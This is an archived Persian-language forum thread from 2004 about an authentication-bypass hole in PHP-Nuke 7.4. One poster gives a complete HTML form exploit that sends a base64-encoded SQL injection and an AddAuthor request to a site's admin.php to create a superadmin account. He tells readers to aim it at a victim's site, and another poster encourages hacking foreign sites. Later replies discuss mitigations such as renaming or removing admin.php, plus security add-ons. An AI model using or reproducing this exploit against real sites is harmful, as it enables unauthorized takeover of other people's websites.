واضح آرشیو وب فارسی:سایت ریسک: t=18164">كساني كه nuke7.4 دارند حتما بخونند (خيلي مهم) nasser110 17 شهريور 1383, 00:19سلام آقا نمي دونم اطلاع داريد يا نه تو سايت مشهد تيم هم اين موضوع رو گفته و همين طور سايت سيمرغ روس هك سايت هاي با ناك 7.4 رو گفته ، با اين روش هر كسي مي تونه يه يوزر با حق دسترسي مدير ايجاد كنه و كاملا رو ناك شما مديريت كنه ، ظاهرا هنوز پتچ امنيتي اراپه نشده ولي راه پيش نهادي من براي هك نشدن هيچ ناكي اين است : فايل Admin.php رو به مثلا Admin128 تغيير بديد و البته بايد اين تغيير رو روي تمام ماژولها اجرا كنيد ، يه كم وقت گيره ولي رد خور نداره حتما اينكارو بكنيد تا ناكتون هك نشه :wink: مرسي باي ara 17 شهريور 1383, 00:34آقا با كدوم روش ؟؟ ميشه روشش هم را بگي ؟ mosi-online 17 شهريور 1383, 01:26يعني اينكه هرچي admin.php داريم اسمش رو رينيم كنيم به admin128.php آره؟ nasser110 17 شهريور 1383, 08:55سلام اينم روشش : اين كد رو در يه فايل html كپي كنيد : <html> <head> <meta "Content-Type" content="text/html; charset=windows-1252"> </head> <body> <form name="mantra" method="POST" action=";//"> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <input type="hidden" name="add_radminsuper" value="1"> <input type="hidden" name="op" value="AddAuthor"> <p>USERNAME: <input type="text" name="add_aid" size="20"> <br> NOME: <input type="text" name="add_name" size="20"> <br> PASSWORD: <input type="text" name="add_pwd" size="20"> <br> E-MAIL: <input type="text" name="add_email" size="20"> </p> <p> <input type="submit" name="Submit" value="Create Admin"> <br> </p> </form> </body> </html> به جاي yor site آدرس اون سايت بد بخت رو بديد ، و بريزيد رويه يه هاست و اجراش كنيد و حالشو ببريد آره فايل admin خودتون رو تغيير نام بديد با ور كنيد ديگه اصلا هك نميشيد :wink: باي swi 17 شهريور 1383, 09:33آقا از كجا بايد بدوني ورژن ناك يك سايت چنده guilanict 17 شهريور 1383, 12:59 هك را تجربه كنيد اما لطفا سايتهاي خارجي. :) nasser110 17 شهريور 1383, 13:14سلام مرسي از معرفي پچ :wink: swi 17 شهريور 1383, 13:20كسي جواب منو نميدونه ؟ guilanict 17 شهريور 1383, 13:23مرسي از شما كه خبر دادي . من واسه امتحان سايت خودمو هك كردم و كيف كردم. :) اين پچ فكر كنم ربطي به اين حفره نداشته باشه. :) devilscholar 17 شهريور 1383, 16:08چرا ديگه - ربط داره! اگه دقت كني اول اين روش آدرس admin.php رو ميخواد!!! اگه تغيير نام بدي ! ديگه نميشه كه! guilanict 17 شهريور 1383, 16:28اما خودمونيما روش خيلي راحت و بيدردسريه ها. اما اينم بگم ادمين سكيور داشته باشي مشكلي نخواهي داشت. sarallah 17 شهريور 1383, 17:17guilanict جان يه بار از قسمت مديريت logout كن ٬ بعد امتحان كن ببين بازم ميشه :wink: nasser110 17 شهريور 1383, 21:18سلام خواهش مي كنم آقا كاري به سيستم ادمين سكيور نداره و هر كي ناكش 7.4 باشه و Admin.php رو بر نداره از روي هاستش حتما هك ميشه فقط هر وقت نياز داشتيد ، admin.php رو آپلود كنيد و يا اينكه تغيير نامش بديد كه البته بايد كامل همه ماژولها رو تغيير نام بديد ، بهترين راه فعلا اينه كه admin.php رو بر داريد . :wink: مرسي sana 159263 17 شهريور 1383, 23:40اقا خيلي از سايتها با اين روش هك نميشه فايلها هم سر جاشه mosi-online 18 شهريور 1383, 00:21من كه اول دارم رو سايت خودم تست ميكنمش... :D:D:D:D Dark Man 18 شهريور 1383, 05:00سايت منو با همين روش هك كردن!حالا بايد چيكار كنم!!؟؟ guilanict 18 شهريور 1383, 07:08ثارالله جان مرسي عزيز اما منظورم اين نبود كه سايتم هك شده بلكه خودم تست كردم و ديدم حواب مي ده. من سطح دسترسي رو عوض كرده ام. باز هم مرسي guilanict 18 شهريور 1383, 07:11dark man عزيز در اين روش يك مدير ساخته مي شود و شما مي تواني براحتي آن را حذف كني مگر طرف وارد باشه و خودشو تبديل به god كرده باشه. البته اون هم از طريق سي پنل قابل حذف است. guilanict 18 شهريور 1383, 07:57شما مي تونيد فايل authors.php را در بخش ماژولهاي ادمين تغيير نام بديد و فقط مواقعي كه خواستيد مدير كم و زياد كنيد اسمشو برگردونيد. من اينو تست كردم و جواب ميده. sasan4u 18 شهريور 1383, 09:03سلام بجاي تغيير نام يا حذف فايلها راههاي امنيتي رو براي مخفي نگه داشتن مدير ناك از اينجا بخونيد از زبان مدير پروژه ادمين سكيور در حال ترجمه سيستم حفاظت از ناك جديدي هستم nuke sentinel نگهبان ناك كه در نظر سنجي سايت پليس هاي ناك nukecops.com (نظر سنجي در صفحه اول سايت است سمت راست) بيشترين راي رو با اختلاف فاحشي نسبت به سيستم هاي حفاظتي ديگه ناك اورده در اين راي گيري ادمين سكيور در رتبه سومه نگهبان ناك از امكانات ipban ويرايش جديد بخوبي استفاده مي كنه و به راحتي رو 7.5 هم قابل نصبه كار ترجمه تست و نوشتن راهنماي فارسي اون قدر ي وقت گيره و فكر نكنم فرصت بشه در ترجمه ناك كمك كنم احتمالا همزمان با اتمام ناك فارسي جديد كار نگهبان ناك هم تمام مي شه و از اونجايي كه مثل يك ماژول داخليه ناك است مي شه همراه با ناك جديد ارايه كرد اين مسله از انجا مهمه كه چند سايت ناك 7.3 كه ادمين سكيور روي اونها نصب بوده هكرها تونستن از بيرون مدير ناك ماژولها رو غير فعال كنن شايد يكي از دلايل اينكه در ورژن جديد اكثر ماژولها بخش ادمين دارن همين نقطه ضعف بوده در اين نظر سنجي آخرين گزينه ديگر روش هاست اين ديگر روشهاي دستي تغيير ناكه و تبديل اون از يك برنامه همگاني به برنامه اي كه خصوصي مي شه و به راحتي نمي شه هكش كرد اصولا اين 5 سيستم حفاظتي ناك كلاسه شده و تكميل و آسون شده همين روشهاي دستي و از اينجا به وجود اومده و هنوز هم در اين سيستم هاي حفاظتي براي اينكه كار كنن بايد قسمتهايي از فايلهاي اصلي ناك رو تغيير داد تركيب بهترين سيستم امنيتي ناك و روشهاي دستي ناكي ايجاد مي كنه كاملا امن و شما وقتي اين تغييرات دستي رو در ناك مي دين بدون نياز به ارتقا اون مي تونيد ماهها بدون ترس از هك شدن به كارهاي سايتتون بپردازيد الان سايت هاي ناكي مي شناسم كه با ورژن 6.5 البته نه نسخه محمد امين چون محمد در ديتابيس ناك دستكاري كرده بود كار مي كنن و بدليل همين تغييرات دستي سيستم دفاعي اونها بهتر از جديدترين محافظين ناك كار مي كنن ( حضور دوباره محمد در سايت را تبريك مي گم اميدورام موفق باشه) مشكل ديگه اي كه استفاده كنندگان ناك فارسي دارن اينه بسياري از ناك هاي فارسي موجود در هنگام فارسي سازي ديتابيس ناك رو دستكاري مي كنن يعني اگه شما از ناك فارسي غير استاندارد با ديتا بيسي كه در هنگام فارسي سازي دستكاري شده بخواهيد تغييرات دستي روي ناك اعمال كنيد و ماهها به اين حالت بمونه و بعد بخواين بعد از يكسال ناك رو به ورژن جديدي كه كس ديگه اي فارسي كرده ارتقا بدين ديتابيس هاي اين ناك هاي فارسي به هم نمي خوره تنها راهش اينه كه از ناك هاي فارسي استفاده كنيد كه توصيه شده و به عنوان ورژن استاندارد معرفي شده ناك 7.3 ثاراله ناك 7.4 نارنج دات كام و ناك 7.5 كه بزودي خواهد امد و به گفته ثاراله در ديتابيس دخل و تصرف نمي شه همچنين وقتي از ناكهاي استاندارد استفاده كنيد يعني ديتابيس اصلي و دستكاري نشده ناك و همزمان از سيستم امنيتي استفاده مي كنيد از بك آپ هاي ديتابيس كه مي گيريد مي تونيد استفاده كنيد و در مورد ديتابيس هاي دستكاري شده وقتي سيستم حفاظتي رو ناك نصب مي شه از بك آپ ديتابيس نمي شه استفاده كرد بهترين كمكي كه شما مي تونيد بكنيد اينه كه اين راهي كه madman مدير پروژه ادمين سكيور كه تنبليش گرفته و ادمين سكيور رو ارتقا نمي ده اما اومده راه حل ارايه مي ده رو براي اين حفره ناك 7.4 امتحان كنيد ببينيد چطوره يه گشتي هم تو فاروم security بزنيد چيزهاي خوب پيدا كنيد هر وقت مشكل امنيتي پيدا شد بهترين مرجع تالارگفتگوي سايت پليس هاي ناكه اصلا يك پروژه تعريف مي كنيم پروژه امنيت ناك و اگه دوست دارين در پروژه امنيت ناك شركت كنيد به سايت پليس هاي ناك سر بزنيد و چيزهاي خوب اونجا پيدا كنيد guilanict 18 شهريور 1383, 09:31ضمن تشكر از توضيحاتتان اين حفره براحتي سيستمهاي ناك رو هك مي كنه و فكر نمي كنم دوستان حاضر باشن تا اتمام فارسي سازي سيستمهاي امنيتي مورد نظرتان دست روي دست بگذارند و شاهد هك شدن سايتشان باشند. منظور من و برخي دوستان از ارايه راه حلهاي بالا تنها كمك فوري به جلوگيري از اين حفره است كه حتي يك بچه هم مي تواند با ان سايت را هك كند. و هيچ يك از ما قصد چاه كني نداريم. فكر كنم بهتره در اظهارنظرها زياد تند نريم. مرسي sasan4u 18 شهريور 1383, 10:26ضمن تشكر از توضيحاتتان اين حفره براحتي سيستمهاي ناك رو هك مي كنه و فكر نمي كنم دوستان حاضر باشن تا اتمام فارسي سازي سيستمهاي امنيتي مورد نظرتان دست روي دست بگذارند و شاهد هك شدن سايتشان باشند. منظور من و برخي دوستان از ارايه راه حلهاي بالا تنها كمك فوري به جلوگيري از اين حفره است كه حتي يك بچه هم مي تواند با ان سايت را هك كند. و هيچ يك از ما قصد چاه كني نداريم. فكر كنم بهتره در اظهارنظرها زياد تند نريم. مرسي اصلا بخاطر همين بود كه اينجا نوشتم وگرنه مي رفتم يه تاپيك ديگه حرف من اينه شما كه علاقمندين به امنيت ناك به سايت پليس هاي ناك سر بزنين راه حل هاي اونجا رو ببينين و راههاي بهتري رو به ديگران توصيه كنيد از بايت اينكه گفتم چاهنمايي عذرخواهي مي كنم
این صفحه را در گوگل محبوب کنید
[ارسال شده از: سایت ریسک]
[مشاهده در: www.ri3k.eu]
[تعداد بازديد از اين مطلب: 449]